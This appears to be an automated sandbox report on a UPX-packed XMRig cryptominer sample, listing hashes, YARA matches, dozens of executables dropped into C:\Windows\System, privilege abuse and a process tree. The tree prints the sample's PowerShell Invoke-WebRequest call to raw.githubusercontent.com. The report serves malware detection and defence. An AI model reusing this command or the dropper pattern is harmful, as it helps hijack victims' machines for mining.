xmrig | 1208050b692399ef453b2cb73bd8a67461894a074afdec40f43554d48354ed1a

Analysis

max time kernel
69s
max time network
53s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
30/04/2024, 05:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

092b3764ee149307d513317ec8395236_JaffaCakes118.exe
Size

1.9MB
MD5

092b3764ee149307d513317ec8395236
SHA1

98d5a2dc73b3dd10a0be08d3208292a8b41f872d
SHA256

1208050b692399ef453b2cb73bd8a67461894a074afdec40f43554d48354ed1a
SHA512

bbaa66832c45491531d3d320398fb6e647f0f1702d5e17a4b883e8204c77060e0c024ab8e8671fa79b9f01f135ea1196a9509106695b64edfff424376cf5d059
SSDEEP

49152:Lz071uv4BPMkibTIA5lCx7kvRWa4p/pOq:NAB3

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 43 IoCs

miner

resource	yara_rule
behavioral2/memory/2968-464-0x00007FF7B1110000-0x00007FF7B1502000-memory.dmp	xmrig
behavioral2/memory/984-465-0x00007FF69FFA0000-0x00007FF6A0392000-memory.dmp	xmrig
behavioral2/memory/4584-466-0x00007FF6177B0000-0x00007FF617BA2000-memory.dmp	xmrig
behavioral2/memory/4224-467-0x00007FF773C50000-0x00007FF774042000-memory.dmp	xmrig
behavioral2/memory/4896-468-0x00007FF6AD560000-0x00007FF6AD952000-memory.dmp	xmrig
behavioral2/memory/3840-471-0x00007FF628560000-0x00007FF628952000-memory.dmp	xmrig
behavioral2/memory/5040-470-0x00007FF6CF700000-0x00007FF6CFAF2000-memory.dmp	xmrig
behavioral2/memory/2060-472-0x00007FF6E0640000-0x00007FF6E0A32000-memory.dmp	xmrig
behavioral2/memory/3184-473-0x00007FF72E6C0000-0x00007FF72EAB2000-memory.dmp	xmrig
behavioral2/memory/4736-476-0x00007FF7985C0000-0x00007FF7989B2000-memory.dmp	xmrig
behavioral2/memory/5012-480-0x00007FF7695B0000-0x00007FF7699A2000-memory.dmp	xmrig
behavioral2/memory/4468-490-0x00007FF694850000-0x00007FF694C42000-memory.dmp	xmrig
behavioral2/memory/4320-486-0x00007FF754C80000-0x00007FF755072000-memory.dmp	xmrig
behavioral2/memory/3584-484-0x00007FF7AACC0000-0x00007FF7AB0B2000-memory.dmp	xmrig
behavioral2/memory/4516-483-0x00007FF75D790000-0x00007FF75DB82000-memory.dmp	xmrig
behavioral2/memory/4808-477-0x00007FF6F87B0000-0x00007FF6F8BA2000-memory.dmp	xmrig
behavioral2/memory/4864-475-0x00007FF754ED0000-0x00007FF7552C2000-memory.dmp	xmrig
behavioral2/memory/4960-474-0x00007FF633F40000-0x00007FF634332000-memory.dmp	xmrig
behavioral2/memory/1632-469-0x00007FF61FE70000-0x00007FF620262000-memory.dmp	xmrig
behavioral2/memory/1156-21-0x00007FF631240000-0x00007FF631632000-memory.dmp	xmrig
behavioral2/memory/3104-2083-0x00007FF739E30000-0x00007FF73A222000-memory.dmp	xmrig
behavioral2/memory/1156-2084-0x00007FF631240000-0x00007FF631632000-memory.dmp	xmrig
behavioral2/memory/3584-2102-0x00007FF7AACC0000-0x00007FF7AB0B2000-memory.dmp	xmrig
behavioral2/memory/1156-2104-0x00007FF631240000-0x00007FF631632000-memory.dmp	xmrig
behavioral2/memory/4320-2107-0x00007FF754C80000-0x00007FF755072000-memory.dmp	xmrig
behavioral2/memory/3104-2108-0x00007FF739E30000-0x00007FF73A222000-memory.dmp	xmrig
behavioral2/memory/4468-2110-0x00007FF694850000-0x00007FF694C42000-memory.dmp	xmrig
behavioral2/memory/2968-2112-0x00007FF7B1110000-0x00007FF7B1502000-memory.dmp	xmrig
behavioral2/memory/4584-2116-0x00007FF6177B0000-0x00007FF617BA2000-memory.dmp	xmrig
behavioral2/memory/4224-2118-0x00007FF773C50000-0x00007FF774042000-memory.dmp	xmrig
behavioral2/memory/4896-2120-0x00007FF6AD560000-0x00007FF6AD952000-memory.dmp	xmrig
behavioral2/memory/1632-2122-0x00007FF61FE70000-0x00007FF620262000-memory.dmp	xmrig
behavioral2/memory/984-2114-0x00007FF69FFA0000-0x00007FF6A0392000-memory.dmp	xmrig
behavioral2/memory/2060-2143-0x00007FF6E0640000-0x00007FF6E0A32000-memory.dmp	xmrig
behavioral2/memory/4516-2149-0x00007FF75D790000-0x00007FF75DB82000-memory.dmp	xmrig
behavioral2/memory/3840-2145-0x00007FF628560000-0x00007FF628952000-memory.dmp	xmrig
behavioral2/memory/3184-2141-0x00007FF72E6C0000-0x00007FF72EAB2000-memory.dmp	xmrig
behavioral2/memory/4960-2139-0x00007FF633F40000-0x00007FF634332000-memory.dmp	xmrig
behavioral2/memory/5012-2135-0x00007FF7695B0000-0x00007FF7699A2000-memory.dmp	xmrig
behavioral2/memory/4736-2133-0x00007FF7985C0000-0x00007FF7989B2000-memory.dmp	xmrig
behavioral2/memory/4864-2129-0x00007FF754ED0000-0x00007FF7552C2000-memory.dmp	xmrig
behavioral2/memory/5040-2148-0x00007FF6CF700000-0x00007FF6CFAF2000-memory.dmp	xmrig
behavioral2/memory/4808-2137-0x00007FF6F87B0000-0x00007FF6F8BA2000-memory.dmp	xmrig

Executes dropped EXE 64 IoCs

pid	Process
3584	wypaRlh.exe
1156	IaIqebs.exe
3104	QZASEON.exe
4320	gxpjBcI.exe
2968	JISPJHt.exe
984	sdLeZJd.exe
4468	VWMjfDJ.exe
4584	axwXjMb.exe
4224	QFWcQGG.exe
4896	OUJecKq.exe
1632	MQmOAQe.exe
5040	McGvqfK.exe
3840	pxjrcEJ.exe
2060	KljKBjD.exe
3184	orLgLXk.exe
4960	WfLAmzx.exe
4864	HXwwkbw.exe
4736	egEkrtu.exe
4808	HSfGESF.exe
5012	uvGFkJK.exe
4516	ahAsqYr.exe
4916	YZFMekY.exe
4848	bwiGfuF.exe
1736	OIjqeRe.exe
4536	pMqrlEC.exe
4988	qadmjWj.exe
1608	FZHjoHT.exe
3516	KyfNGDT.exe
1684	WhlxYxU.exe
3756	xyMyQIb.exe
3888	JmKRSlJ.exe
2816	yqsFoGZ.exe
3096	osEJKvn.exe
2872	kcXEibM.exe
3240	xzEhKBM.exe
2684	pFcmVCQ.exe
2464	AtQWgTB.exe
3152	qETcWqP.exe
4460	AwlkXAn.exe
4540	EbNsKSU.exe
4644	qJLhfFr.exe
3976	EzedCEQ.exe
4424	oKwGaro.exe
3700	FMrgNAF.exe
4900	fcIZMWH.exe
4256	narUNnS.exe
1988	DBkvCcf.exe
4272	zpgciNE.exe
1360	mHBpnxJ.exe
4772	wOcUrhN.exe
3180	utyrfbf.exe
4884	HCEjWHm.exe
5008	ElxQDwY.exe
2364	BSPopbF.exe
4168	wVLhWjY.exe
3944	wduscfZ.exe
4908	HxpMpJu.exe
1448	uuRshnn.exe
944	bgzCyFM.exe
3520	OPuPXyg.exe
4136	SLAFgEv.exe
1952	PhwXoQO.exe
4504	wmJmzQS.exe
2444	nXYFltc.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4804-0-0x00007FF6562F0000-0x00007FF6566E2000-memory.dmp	upx
behavioral2/files/0x000e000000023b8a-5.dat	upx
behavioral2/files/0x000a000000023b98-7.dat	upx
behavioral2/files/0x000a000000023b97-8.dat	upx
behavioral2/files/0x000a000000023b9a-39.dat	upx
behavioral2/files/0x000a000000023b9e-53.dat	upx
behavioral2/files/0x000a000000023ba1-73.dat	upx
behavioral2/files/0x000a000000023ba4-88.dat	upx
behavioral2/files/0x000a000000023ba9-113.dat	upx
behavioral2/files/0x000a000000023bab-131.dat	upx
behavioral2/files/0x000a000000023baf-143.dat	upx
behavioral2/files/0x000a000000023bb6-178.dat	upx
behavioral2/files/0x000a000000023bb4-176.dat	upx
behavioral2/files/0x000a000000023bb5-173.dat	upx
behavioral2/files/0x000a000000023bb3-171.dat	upx
behavioral2/files/0x000a000000023bb2-166.dat	upx
behavioral2/files/0x000a000000023bb1-161.dat	upx
behavioral2/files/0x000a000000023bb0-156.dat	upx
behavioral2/files/0x000a000000023bae-146.dat	upx
behavioral2/files/0x000a000000023bad-141.dat	upx
behavioral2/files/0x000a000000023bac-136.dat	upx
behavioral2/files/0x000a000000023baa-126.dat	upx
behavioral2/memory/2968-464-0x00007FF7B1110000-0x00007FF7B1502000-memory.dmp	upx
behavioral2/memory/984-465-0x00007FF69FFA0000-0x00007FF6A0392000-memory.dmp	upx
behavioral2/files/0x000a000000023ba8-116.dat	upx
behavioral2/memory/4584-466-0x00007FF6177B0000-0x00007FF617BA2000-memory.dmp	upx
behavioral2/memory/4224-467-0x00007FF773C50000-0x00007FF774042000-memory.dmp	upx
behavioral2/memory/4896-468-0x00007FF6AD560000-0x00007FF6AD952000-memory.dmp	upx
behavioral2/memory/3840-471-0x00007FF628560000-0x00007FF628952000-memory.dmp	upx
behavioral2/memory/5040-470-0x00007FF6CF700000-0x00007FF6CFAF2000-memory.dmp	upx
behavioral2/memory/2060-472-0x00007FF6E0640000-0x00007FF6E0A32000-memory.dmp	upx
behavioral2/memory/3184-473-0x00007FF72E6C0000-0x00007FF72EAB2000-memory.dmp	upx
behavioral2/memory/4736-476-0x00007FF7985C0000-0x00007FF7989B2000-memory.dmp	upx
behavioral2/memory/5012-480-0x00007FF7695B0000-0x00007FF7699A2000-memory.dmp	upx
behavioral2/memory/4468-490-0x00007FF694850000-0x00007FF694C42000-memory.dmp	upx
behavioral2/memory/4320-486-0x00007FF754C80000-0x00007FF755072000-memory.dmp	upx
behavioral2/memory/3584-484-0x00007FF7AACC0000-0x00007FF7AB0B2000-memory.dmp	upx
behavioral2/memory/4516-483-0x00007FF75D790000-0x00007FF75DB82000-memory.dmp	upx
behavioral2/memory/4808-477-0x00007FF6F87B0000-0x00007FF6F8BA2000-memory.dmp	upx
behavioral2/memory/4864-475-0x00007FF754ED0000-0x00007FF7552C2000-memory.dmp	upx
behavioral2/memory/4960-474-0x00007FF633F40000-0x00007FF634332000-memory.dmp	upx
behavioral2/memory/1632-469-0x00007FF61FE70000-0x00007FF620262000-memory.dmp	upx
behavioral2/files/0x000a000000023ba7-111.dat	upx
behavioral2/files/0x000a000000023ba6-106.dat	upx
behavioral2/files/0x000a000000023ba5-101.dat	upx
behavioral2/files/0x000a000000023ba3-91.dat	upx
behavioral2/files/0x000a000000023ba2-86.dat	upx
behavioral2/files/0x000a000000023ba0-76.dat	upx
behavioral2/files/0x000a000000023b9f-71.dat	upx
behavioral2/files/0x000b000000023b9b-66.dat	upx
behavioral2/files/0x000b000000023b9c-56.dat	upx
behavioral2/files/0x000a000000023b9d-48.dat	upx
behavioral2/memory/3104-41-0x00007FF739E30000-0x00007FF73A222000-memory.dmp	upx
behavioral2/files/0x000a000000023b99-33.dat	upx
behavioral2/memory/1156-21-0x00007FF631240000-0x00007FF631632000-memory.dmp	upx
behavioral2/memory/3104-2083-0x00007FF739E30000-0x00007FF73A222000-memory.dmp	upx
behavioral2/memory/1156-2084-0x00007FF631240000-0x00007FF631632000-memory.dmp	upx
behavioral2/memory/3584-2102-0x00007FF7AACC0000-0x00007FF7AB0B2000-memory.dmp	upx
behavioral2/memory/1156-2104-0x00007FF631240000-0x00007FF631632000-memory.dmp	upx
behavioral2/memory/4320-2107-0x00007FF754C80000-0x00007FF755072000-memory.dmp	upx
behavioral2/memory/3104-2108-0x00007FF739E30000-0x00007FF73A222000-memory.dmp	upx
behavioral2/memory/4468-2110-0x00007FF694850000-0x00007FF694C42000-memory.dmp	upx
behavioral2/memory/2968-2112-0x00007FF7B1110000-0x00007FF7B1502000-memory.dmp	upx
behavioral2/memory/4584-2116-0x00007FF6177B0000-0x00007FF617BA2000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\VWMjfDJ.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\xcXfyeQ.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\eFLJBlm.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\JbtyLai.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\QWKFuTq.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\WMEEaAi.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\TLHJETr.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\fOKpEUf.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\uvGFkJK.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\kcXEibM.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\bseLrvM.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\vIkdEqQ.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\NiYZWiG.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\TbqwtdG.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\lcUuOua.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\nfyqoAO.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\jiSNAvK.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\UKVKMnd.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\GUPSPwT.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\ptEWzXv.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\NRptCJQ.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\hPRGhdg.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\ogiNlsP.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\topxJuL.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\AeyBEIB.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\BtDpPHq.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\QETRsOj.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\pbBqqrX.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\AwlkXAn.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\gljjdtf.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\tclIcXB.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\picMCpf.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\LhXaEuE.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\XmsRJuO.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\mcIJNeU.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\ThkArgf.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\pFcmVCQ.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\uPsBflG.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\LbxQGfl.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\ZdHrrIn.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\eUNWJJp.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\KOwJrju.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\gJRNSmZ.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\hOaWDYh.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\MoMLsms.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\brBLHxH.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\SINLltu.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\XHIUqzS.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\EXkLlBX.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\rNJocbm.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\XTWkKZT.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\TWIInnA.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\KtIqpJp.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\WfLAmzx.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\zpgciNE.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\fytFbEn.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\scDecMp.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\fQpnIdL.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\IJseSXD.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\fZEcnxI.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\xtiZRXL.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\gRhwxyA.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\TLaKXUT.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
File created	C:\Windows\System\zGSWgnE.exe	092b3764ee149307d513317ec8395236_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4948	powershell.exe
4948	powershell.exe
4948	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeLockMemoryPrivilege	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4804 wrote to memory of 4948	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	85
PID 4804 wrote to memory of 4948	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	85
PID 4804 wrote to memory of 3584	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	86
PID 4804 wrote to memory of 3584	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	86
PID 4804 wrote to memory of 1156	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	87
PID 4804 wrote to memory of 1156	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	87
PID 4804 wrote to memory of 3104	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	88
PID 4804 wrote to memory of 3104	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	88
PID 4804 wrote to memory of 4320	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	89
PID 4804 wrote to memory of 4320	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	89
PID 4804 wrote to memory of 2968	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	90
PID 4804 wrote to memory of 2968	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	90
PID 4804 wrote to memory of 984	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	91
PID 4804 wrote to memory of 984	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	91
PID 4804 wrote to memory of 4468	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	92
PID 4804 wrote to memory of 4468	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	92
PID 4804 wrote to memory of 4584	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	93
PID 4804 wrote to memory of 4584	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	93
PID 4804 wrote to memory of 4224	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	94
PID 4804 wrote to memory of 4224	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	94
PID 4804 wrote to memory of 4896	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	95
PID 4804 wrote to memory of 4896	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	95
PID 4804 wrote to memory of 1632	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	96
PID 4804 wrote to memory of 1632	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	96
PID 4804 wrote to memory of 5040	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	97
PID 4804 wrote to memory of 5040	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	97
PID 4804 wrote to memory of 3840	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	98
PID 4804 wrote to memory of 3840	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	98
PID 4804 wrote to memory of 2060	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	99
PID 4804 wrote to memory of 2060	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	99
PID 4804 wrote to memory of 3184	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	100
PID 4804 wrote to memory of 3184	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	100
PID 4804 wrote to memory of 4960	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	101
PID 4804 wrote to memory of 4960	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	101
PID 4804 wrote to memory of 4864	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	102
PID 4804 wrote to memory of 4864	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	102
PID 4804 wrote to memory of 4736	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	103
PID 4804 wrote to memory of 4736	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	103
PID 4804 wrote to memory of 4808	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	104
PID 4804 wrote to memory of 4808	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	104
PID 4804 wrote to memory of 5012	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	105
PID 4804 wrote to memory of 5012	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	105
PID 4804 wrote to memory of 4516	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	106
PID 4804 wrote to memory of 4516	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	106
PID 4804 wrote to memory of 4916	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	107
PID 4804 wrote to memory of 4916	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	107
PID 4804 wrote to memory of 4848	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	108
PID 4804 wrote to memory of 4848	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	108
PID 4804 wrote to memory of 1736	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	109
PID 4804 wrote to memory of 1736	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	109
PID 4804 wrote to memory of 4536	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	110
PID 4804 wrote to memory of 4536	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	110
PID 4804 wrote to memory of 4988	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	111
PID 4804 wrote to memory of 4988	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	111
PID 4804 wrote to memory of 1608	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	112
PID 4804 wrote to memory of 1608	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	112
PID 4804 wrote to memory of 3516	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	113
PID 4804 wrote to memory of 3516	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	113
PID 4804 wrote to memory of 1684	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	114
PID 4804 wrote to memory of 1684	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	114
PID 4804 wrote to memory of 3756	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	115
PID 4804 wrote to memory of 3756	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	115
PID 4804 wrote to memory of 3888	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	116
PID 4804 wrote to memory of 3888	4804	092b3764ee149307d513317ec8395236_JaffaCakes118.exe	116

C:\Users\Admin\AppData\Local\Temp\092b3764ee149307d513317ec8395236_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\092b3764ee149307d513317ec8395236_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4948
- C:\Windows\System\wypaRlh.exe
  C:\Windows\System\wypaRlh.exe
  2⤵
  - Executes dropped EXE
  PID:3584
- C:\Windows\System\IaIqebs.exe
  C:\Windows\System\IaIqebs.exe
  2⤵
  - Executes dropped EXE
  PID:1156
- C:\Windows\System\QZASEON.exe
  C:\Windows\System\QZASEON.exe
  2⤵
  - Executes dropped EXE
  PID:3104
- C:\Windows\System\gxpjBcI.exe
  C:\Windows\System\gxpjBcI.exe
  2⤵
  - Executes dropped EXE
  PID:4320
- C:\Windows\System\JISPJHt.exe
  C:\Windows\System\JISPJHt.exe
  2⤵
  - Executes dropped EXE
  PID:2968
- C:\Windows\System\sdLeZJd.exe
  C:\Windows\System\sdLeZJd.exe
  2⤵
  - Executes dropped EXE
  PID:984
- C:\Windows\System\VWMjfDJ.exe
  C:\Windows\System\VWMjfDJ.exe
  2⤵
  - Executes dropped EXE
  PID:4468
- C:\Windows\System\axwXjMb.exe
  C:\Windows\System\axwXjMb.exe
  2⤵
  - Executes dropped EXE
  PID:4584
- C:\Windows\System\QFWcQGG.exe
  C:\Windows\System\QFWcQGG.exe
  2⤵
  - Executes dropped EXE
  PID:4224
- C:\Windows\System\OUJecKq.exe
  C:\Windows\System\OUJecKq.exe
  2⤵
  - Executes dropped EXE
  PID:4896
- C:\Windows\System\MQmOAQe.exe
  C:\Windows\System\MQmOAQe.exe
  2⤵
  - Executes dropped EXE
  PID:1632
- C:\Windows\System\McGvqfK.exe
  C:\Windows\System\McGvqfK.exe
  2⤵
  - Executes dropped EXE
  PID:5040
- C:\Windows\System\pxjrcEJ.exe
  C:\Windows\System\pxjrcEJ.exe
  2⤵
  - Executes dropped EXE
  PID:3840
- C:\Windows\System\KljKBjD.exe
  C:\Windows\System\KljKBjD.exe
  2⤵
  - Executes dropped EXE
  PID:2060
- C:\Windows\System\orLgLXk.exe
  C:\Windows\System\orLgLXk.exe
  2⤵
  - Executes dropped EXE
  PID:3184
- C:\Windows\System\WfLAmzx.exe
  C:\Windows\System\WfLAmzx.exe
  2⤵
  - Executes dropped EXE
  PID:4960
- C:\Windows\System\HXwwkbw.exe
  C:\Windows\System\HXwwkbw.exe
  2⤵
  - Executes dropped EXE
  PID:4864
- C:\Windows\System\egEkrtu.exe
  C:\Windows\System\egEkrtu.exe
  2⤵
  - Executes dropped EXE
  PID:4736
- C:\Windows\System\HSfGESF.exe
  C:\Windows\System\HSfGESF.exe
  2⤵
  - Executes dropped EXE
  PID:4808
- C:\Windows\System\uvGFkJK.exe
  C:\Windows\System\uvGFkJK.exe
  2⤵
  - Executes dropped EXE
  PID:5012
- C:\Windows\System\ahAsqYr.exe
  C:\Windows\System\ahAsqYr.exe
  2⤵
  - Executes dropped EXE
  PID:4516
- C:\Windows\System\YZFMekY.exe
  C:\Windows\System\YZFMekY.exe
  2⤵
  - Executes dropped EXE
  PID:4916
- C:\Windows\System\bwiGfuF.exe
  C:\Windows\System\bwiGfuF.exe
  2⤵
  - Executes dropped EXE
  PID:4848
- C:\Windows\System\OIjqeRe.exe
  C:\Windows\System\OIjqeRe.exe
  2⤵
  - Executes dropped EXE
  PID:1736
- C:\Windows\System\pMqrlEC.exe
  C:\Windows\System\pMqrlEC.exe
  2⤵
  - Executes dropped EXE
  PID:4536
- C:\Windows\System\qadmjWj.exe
  C:\Windows\System\qadmjWj.exe
  2⤵
  - Executes dropped EXE
  PID:4988
- C:\Windows\System\FZHjoHT.exe
  C:\Windows\System\FZHjoHT.exe
  2⤵
  - Executes dropped EXE
  PID:1608
